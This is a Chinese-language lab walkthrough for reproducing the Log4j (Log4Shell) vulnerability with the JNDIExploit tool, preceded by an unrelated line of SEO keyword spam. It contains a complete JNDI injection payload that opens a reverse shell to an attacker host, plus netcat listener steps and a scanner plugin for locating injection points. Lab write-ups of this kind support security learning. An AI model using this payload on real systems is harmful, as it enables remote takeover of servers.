网站服务器关闭,wordpress菜单下拉,wordpress怎么添加ico,2017三五互联做网站怎么样1.进入到改工具所在的目录#xff0c;然后cmd打开命令行
查看一下帮助信息 -l 指定开启ladp服务的端口
-p 指定开启http服务的端口
-i 指定开启服务的ip#xff0c;也就是攻击者的ip#xff0c;也可以是黑客的公网服务器
因为这里的靶场是部署在kali当中的#xf…1.进入到改工具所在的目录然后cmd打开命令行
查看一下帮助信息 -l 指定开启ladp服务的端口
-p 指定开启http服务的端口
-i 指定开启服务的ip也就是攻击者的ip也可以是黑客的公网服务器
因为这里的靶场是部署在kali当中的所以我们用两台kali来演示实测当中发现如果有一台用windos成功几率不大
攻击机 192.168.75.134 靶机 133
2.攻击流程
靶机开启nc监听 6666 端口
在靶机上启动 JNDIExploit-1.2-SNAPSHOT.jar 含义 在本机开启ldap服务占用8888端口同时开启http服务占用9999端口
pocldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte
实际构造${jndi:ldap://192.168.75.134:8888/Basic/ReverseShell/192.168.75.134/6666}
把这段代码发给服务器当中存在log4j漏洞的点然后让他去访问攻击机的ldap服务的8888端口然后与攻击机的6666端口建立反弹shell。
这里的6666端口就是nc监听的端口
由于这里是使用工具封装好的指令所以只需要给参数即可。
在构造好poc之后就要寻找漏洞注入点了并不是说只要使用了log4j这个框架的网站你去随便构造poc提交给服务器都会成功的这里我使用了bp当中的一个log4j的扫描插件在它提示有注入点的地方构造poc即可。插件叫log4j2scan可以自己去下载导入 提交poc 虽然响应400但是反弹shell成功了.
补充说明
在完成这个复现的时候我是分两次完成的所以在文章前面我说的是使用8888开启ldap服务但是在后半部分我在实际操作的时候用了默认的1389端口。大家复现的时候随便选择一个端口即可但是要保证和poc当中的端口对应即可。
还有就是之所以这个实验做了两次就是因为在这个实验当中我第一次做的时候由于这个复现是使用那个脚本所以直接使用命令去开启http服务和ldap服务 但是我发现开启了http服务但是没法访问到我以为是环境的问题就打算第二天再做。结果第二天还是不行后来终于搞明白了他这里使用工具开启http服务的指令实际上并没有真正的开启http服务只是做了一个端口监听让靶机误以为开启了ldap服务和http服务。但是去访问的时候就会执行恶意poc主要还是这个工具封装的问题使得我们复现起来简单但是实际上工具把很多的底层原理都给封装起来了我们看不到。
如果是手工复现的话就是需要真正开启http服务和ldap服务并且把我们编译好的class文件放到我们的http服务上面让靶机来下载。